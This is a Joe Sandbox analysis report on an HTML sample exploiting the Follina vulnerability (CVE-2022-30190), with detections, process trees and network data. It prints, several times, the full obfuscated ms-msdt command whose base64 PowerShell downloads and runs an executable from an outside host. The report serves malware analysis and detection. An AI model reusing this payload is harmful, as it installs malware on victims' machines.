Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fbGUvJ4AdV.html

Overview

General Information

Sample Name:fbGUvJ4AdV.html
Analysis ID:696621
MD5:da3469806af3aacbbbd22a763343fff2
SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
Tags:CVE-2022-30190Exploithtml
Infos:

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Classification

  • System is w10x64
  • chrome.exe (PID: 5708 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • msdt.exe (PID: 6208 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • chrome.exe (PID: 1108 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: fbGUvJ4AdV.htmlVirustotal: Detection: 11%Perma Link

        Exploits

        barindex
        Source: Yara matchFile source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: unknownDNS traffic detected: queries for: clients2.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
        Source: fbGUvJ4AdV.htmlVirustotal: Detection: 11%
        Source: C:\Windows\System32\msdt.exeFile created: C:\Users\user\AppData\Local\Temp\msdtadminJump to behavior
        Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: classification engineClassification label: mal56.expl.winHTML@39/0@4/9
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: fbGUvJ4AdV.htmlString : entropy: 5.72, length: 262, content: "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[Go to definition
        Source: fbGUvJ4AdV.htmlString : entropy: 5.27, length: 145, content: "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoGo to definition
        Source: fbGUvJ4AdV.htmlString : entropy: 5.31, length: 116, content: "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUGo to definition
        Source: fbGUvJ4AdV.htmlString : entropy: 5.44, length: 148, content: "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AGo to definition
        Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 2734Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22Jump to behavior
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        Path Interception1
        Process Injection
        2
        Masquerading
        OS Credential Dumping1
        Application Window Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Scripting
        Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS Memory1
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Data Encoding
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Scripting
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer4
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
        Ingress Tool Transfer
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        fbGUvJ4AdV.html12%ReversingLabsScript.Exploit.Heuristic
        fbGUvJ4AdV.html12%VirustotalBrowse
        fbGUvJ4AdV.html0%MetadefenderBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        accounts.google.com
        216.58.215.237
        truefalse
          high
          www.google.com
          172.217.168.36
          truefalse
            high
            clients.l.google.com
            172.217.168.78
            truefalse
              high
              clients2.google.com
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                  high
                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    216.58.215.237
                    accounts.google.comUnited States
                    15169GOOGLEUSfalse
                    172.217.168.78
                    clients.l.google.comUnited States
                    15169GOOGLEUSfalse
                    172.217.168.36
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    239.255.255.250
                    unknownReserved
                    unknownunknownfalse
                    IP
                    192.168.2.1
                    192.168.2.4
                    192.168.2.5
                    192.168.2.23
                    127.0.0.1
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:696621
                    Start date and time:2022-09-02 15:27:50 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:fbGUvJ4AdV.html
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:25
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • GSI enabled (Javascript)
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal56.expl.winHTML@39/0@4/9
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .html
                    • Adjust boot time
                    • Enable AMSI
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
